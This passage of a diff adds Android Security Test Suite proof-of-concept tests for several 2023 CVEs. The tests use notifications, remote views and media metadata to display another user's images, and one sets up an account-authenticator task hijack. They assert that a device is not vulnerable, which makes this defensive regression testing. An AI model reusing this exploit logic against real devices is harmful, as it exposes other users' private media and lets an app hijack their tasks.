+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
+ } catch (IOException e) {
+ Log.i("CVE-2023-21285", "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Create a MediaSession
+ MediaSession session = new MediaSession(context, "cve_2023_21285_session");
+
+ // Create a separate handler thread
+ final HandlerThread handlerThread = new HandlerThread("cve_2023_21285_handlerThread");
+ handlerThread.start();
+
+ // Fetch uri from onMetadataChanged()
+ CompletableFuture<Boolean> uriReceived = new CompletableFuture<Boolean>();
+ session.getController()
+ .registerCallback(
+ new MediaController.Callback() {
+ @Override
+ public void onMetadataChanged(MediaMetadata metadata) {
+ uriReceived.complete(
+ metadata.getString(MediaMetadata.METADATA_KEY_ART_URI)
+ == null);
+ }
+ },
+ new Handler(handlerThread.getLooper()));
+
+ // Create MediaMetadata with 'uri' of cve_2023_21285_user and set metadata for 'session'
+ session.setMetadata(
+ new MediaMetadata.Builder()
+ .putString(
+ MediaMetadata.METADATA_KEY_ART_URI,
+ ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId)
+ .toString())
+ .build());
+
+ // Fail the test if uri stored in 'METADATA_KEY_ART_URI' in mediaMetadata is not null
+ assertTrue(
+ "Device is vulnerable to b/271851153, hence images"
+ + " belonging to another user on the same device"
+ + " can be displayed in MediaStyle notifications",
+ uriReceived.get(5_000L /* timeout */, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
new file mode 100644
index 0000000..c0e20ea
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21286",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
new file mode 100644
index 0000000..ad513e9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21286">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21286" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
new file mode 100644
index 0000000..abb85d3
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21286_img"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
new file mode 100644
index 0000000..e3588ce
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/res/layout/cve_2023_21286_layout_outer.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/cve_2023_21286_outer"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
new file mode 100644
index 0000000..55c75be
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21286/src/android/security/cts/CVE_2023_21286/DeviceTest.java
@@ -0,0 +1,145 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21286;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private AutoCloseable withAdoptShellPermissionIdentity(
+ UiAutomation uiAutomation, String permission) {
+ uiAutomation.adoptShellPermissionIdentity(permission);
+
+ // Remove permissions
+ return () -> uiAutomation.dropShellPermissionIdentity();
+ }
+
+ @Test
+ public void testPocCVE_2023_21286() {
+ UiDevice uiDevice = null;
+ try {
+ final String cveId = "cve_2023_21286_";
+ final String title = cveId + "title";
+
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ UiAutomation uiAutomation = instrumentation.getUiAutomation();
+ uiDevice = UiDevice.getInstance(instrumentation);
+ int userId = -1;
+
+ // Retrieve created user Id
+ try (AutoCloseable withAdoptShellPermissionIdentity =
+ withAdoptShellPermissionIdentity(
+ uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+ final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+ for (UserInfo info : list) {
+ if (info.name.contains(cveId)) {
+ userId = info.id;
+ break;
+ }
+ }
+ }
+ assumeTrue(userId != -1);
+
+ // Post a notification with a content view containing image from other user
+ RemoteViews rvPortrait =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout);
+ rvPortrait.setImageViewUri(
+ R.id.cve_2023_21286_img,
+ Uri.parse("content://" + userId + "@media/external/images/media/"));
+ NotificationChannel notificationChannel =
+ new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+ RemoteViews rvOuter =
+ new RemoteViews(context.getPackageName(), R.layout.cve_2023_21286_layout_outer);
+ rvOuter.addView(R.id.cve_2023_21286_outer, rvPortrait);
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+ Notification notification =
+ new Notification.Builder(context, cveId)
+ .setContentTitle(title)
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+ .setCustomContentView(rvOuter)
+ .setCustomBigContentView(rvOuter)
+ .build();
+ try {
+ notificationManager.notify(0 /* id */, notification);
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Open notification shade
+ assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+ // Wait for notification to appear and detect if the remote view is present
+ uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+ UiObject2 exposedImg =
+ uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+ assertNull(
+ "Device is vulnerable to b/277740082, Other user's images can be exposed in"
+ + " notifications using remote views",
+ exposedImg);
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiDevice.pressHome();
+ } catch (Exception e) {
+ // Ignore exceptions as the test has finished
+ }
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
new file mode 100644
index 0000000..5b4d51f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/Android.bp
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21291",
+ defaults: ["cts_support_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "compatibility-device-util-axt",
+ "sts-device-util",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
new file mode 100644
index 0000000..b5bd618
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21291">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21291" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
new file mode 100644
index 0000000..ee75317
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21291/src/android/security/cts/CVE_2023_21291/DeviceTest.java
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21291;
+
+import static android.Manifest.permission.CREATE_USERS;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.Person;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testPocCVE_2023_21291() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ final UserManager userManager = context.getSystemService(UserManager.class);
+
+ // Check if the device supports multiple users or not
+ assumeTrue(
+ "This device does not support multiple users",
+ userManager.supportsMultipleUsers());
+
+ // Get the user id of "cve_2023_21291_user"
+ int testUserId =
+ SystemUtil.runWithShellPermissionIdentity(
+ () -> {
+ List<UserInfo> list = userManager.getUsers();
+ for (UserInfo info : list) {
+ if (info.toString().contains("cve_2023_21291_user")) {
+ return info.getUserHandle().getIdentifier();
+ }
+ }
+ return -1;
+ },
+ CREATE_USERS);
+ assumeTrue("Unable to find the user cve_2023_21291_user", testUserId != -1);
+
+ // Insert a placeholder content in the new user and query it to see if it has been
+ // inserted successfully
+ final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+ assumeTrue(
+ "Failed to insert a placeholder content in the test user",
+ poll(
+ () -> {
+ try {
+ SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content insert --user %d --uri %s --bind "
+ + "_display_name:s:cve_2023_21291.jpg",
+ testUserId, imagesContentUri));
+ return SystemUtil.runShellCommand(
+ instrumentation,
+ String.format(
+ "content query " + "--user %d --uri %s",
+ testUserId, imagesContentUri))
+ .contains("Row");
+ } catch (Exception e) {
+ Log.i("CVE-2023-21291", "Got an exception: " + e);
+ }
+ return false;
+ }));
+
+ // Create notificationManager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Create notificationChannel
+ String channelId = "cve_2023_21291_channel_id";
+ notificationManager.createNotificationChannel(
+ new NotificationChannel(
+ channelId,
+ "cve_2023_21291_channel_name" /* notification channel name */,
+ NotificationManager.IMPORTANCE_DEFAULT));
+
+ // Post the Notification and check if any security exception is caught
+ try {
+ notificationManager.notify(
+ 0 /* notification id */,
+ new Notification.Builder(context)
+ .setChannelId(channelId)
+ .setStyle(
+ new Notification.MessagingStyle(
+ new Person.Builder()
+ .setName("cve_2023_21291_person")
+ .build())
+ .setShortcutIcon(
+ Icon.createWithContentUri(
+ ContentProvider.maybeAddUserId(
+ EXTERNAL_CONTENT_URI,
+ testUserId))))
+ .setSmallIcon(
+ Icon.createWithData(
+ new byte[0] /* data */,
+ 0 /* offset */,
+ 0 /* length */))
+ .build());
+ } catch (SecurityException securityException) {
+ if (securityException
+ .getLocalizedMessage()
+ .toLowerCase()
+ .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+ // Ignore exception thrown with fix and exit the test
+ return;
+ } else {
+ throw securityException;
+ }
+ }
+
+ // Check if notification gets posted or not, fail the test if notification gets posted
+ assertFalse(
+ "Device is vulnerable to b/277593270 hence images belonging to another user on"
+ + " the same device can be displayed in conversation notifications",
+ poll(
+ () -> {
+ StatusBarNotification[] activeNotifications =
+ notificationManager.getActiveNotifications();
+ for (StatusBarNotification notification : activeNotifications) {
+ if (notification
+ .getPackageName()
+ .equals(context.getPackageName())) {
+ return true;
+ }
+ }
+ return false;
+ }));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
new file mode 100644
index 0000000..ccb0a70
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/Android.bp
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-35669-target",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "target-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ manifest: "target-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+ name: "CVE-2023-35669-test",
+ defaults: [
+ "cts_support_defaults",
+ ],
+ srcs: [
+ "test-app/src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "compatibility-device-util-axt",
+ ],
+ manifest: "test-app/AndroidManifest.xml",
+ resource_dirs: [
+ "res",
+ "test-app/res",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
new file mode 100644
index 0000000..1dd7032
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/res/values/strings.xml
@@ -0,0 +1,40 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="accountName">TestAccount</string>
+ <string name="accountType">testevilaccount</string>
+ <string name="actionTarget">actionTarget</string>
+ <string name="activityTarget">android.security.cts.CVE_2023_35669_target.TargetActivity</string>
+ <string name="app_name">CVE_2023_35669</string>
+ <string name="bcastActionTarget">CVE_2023_35669_TargetActivity</string>
+ <string name="fieldName">mNonLocalizedLabel</string>
+ <string name="isVulnerable">isVulnerable</string>
+ <string name="launchTaskId">android.activity.launchTaskId</string>
+ <string name="msgFailure">Device is vulnerable to b/265798288 !!</string>
+ <string name="noExceptionMsg">no exception</string>
+ <string name="objectNotFound">%1$s account not found</string>
+ <string name="password">password</string>
+ <string name="pkgTarget">android.security.cts.CVE_2023_35669_target</string>
+ <string name="pocActivityStatus">status</string>
+ <string name="pocCrashedMsg">PocActivity crashed with exception: %s</string>
+ <string name="pocFailedMsg">pocActivity failed</string>
+ <string name="removeAccount">REMOVE ACCOUNT</string>
+ <string name="spannableString">A</string>
+ <string name="targetFailMsg">TargetActivity did not launch successfully</string>
+ <string name="taskId">taskId</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
new file mode 100644
index 0000000..8188feb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/AndroidManifest.xml
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright (C) 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_35669_target">
+
+ <application>
+ <activity
+ android:name=".TargetActivity"
+ android:exported="true" />
+ </application>
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
new file mode 100644
index 0000000..d8c3536
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/target-app/src/android/security/cts/CVE_2023_35669_target/TargetActivity.java
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_target;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class TargetActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ super.onResume();
+ sendBroadcast(
+ new Intent(getString(R.string.bcastActionTarget))
+ .putExtra(getString(R.string.actionTarget), true)
+ .putExtra(getString(R.string.taskId), getTaskId()));
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..ea24191
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/AndroidManifest.xml
@@ -0,0 +1,41 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_35669_test">
+
+ <application>
+ <activity android:name=".HijackActivity" />
+
+ <service
+ android:name=".PocAuthService"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/authenticator" />
+ </service>
+
+ <activity android:name=".PocActivity" />
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_35669_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
new file mode 100644
index 0000000..a4906cb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/res/xml/authenticator.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<account-authenticator xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="testevilaccount"
+ android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
new file mode 100644
index 0000000..026aa57
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-35669/test-app/src/android/security/cts/CVE_2023_35669_test/DeviceTest.java
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_35669_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ private String mPocActivityStatus;
+ public static int sTaskId;
+ public static final int TIMEOUT_MS = 5000;
+
+ @Test
+ public void testCVE_2023_35669() {
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ runWithShellPermissionIdentity(
+ () -> {
+ // Registering a receiver here to wait for broadcast
+ final Semaphore targetReturn = new Semaphore(0);
+ final Semaphore hijackReturn = new Semaphore(0);
+ final Semaphore pocReturn = new Semaphore(0);
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ // Wait for TargetActivity to get launched
+ if (intent.getBooleanExtra(
+ context.getString(R.string.actionTarget),
+ false)) {
+ // Fetch taskId
+ sTaskId =
